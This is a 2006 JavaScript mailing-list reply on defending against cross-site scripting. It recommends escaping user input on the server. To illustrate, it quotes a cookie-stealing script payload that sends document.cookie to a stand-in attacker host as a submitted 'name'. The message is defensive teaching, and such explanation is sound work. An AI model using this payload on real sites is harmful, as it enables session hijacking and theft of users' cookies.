[Javascript] Javascript Security
tedd
tedd at sperling.com
Sun Aug 6 09:41:21 CDT 2006
At 6:49 AM -0400 8/6/06, Mark Wonsil wrote:
>With the advent of AJAX, I've been noticing more articles about Javascript
>security, like this one:
>
>http://news.zdnet.com/2100-1009_22-6099891.html?tag=nl.e540
>
>which claim that security can only be attained at the server. The article does
>not go into what kind of security specifically. So I was wondering, what do
>people recommend to protect against cross-site scripting, etc.?
>
>Mark W.
Mark:
Yes, security can better be served at the server -- you simply can't
trust client-side.
You protect server-side by inspecting everything you gather and send
back to the browser.
For example, if you have a form that gathers the name of poster to be
listed in your blog, you don't want that name passed back to the
browser without al least altering any offensive html code it may
contain.
Let's take this "name" submitted by an evil person:
<script>
document.location='htttp://evil.exampe.org/steal.php?cookies=' +
document.cookie
</script>
What would that do to your blog if posted "as-is"?
So, you replace all the html characters with their html equivalents
(< and such), so that the html will treat the submitted data as
text and not code -- get the idea?
You might want to purchase/read PHP Security by Shiflett -- a great
book and well worth the price.
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
More information about the Javascript
mailing list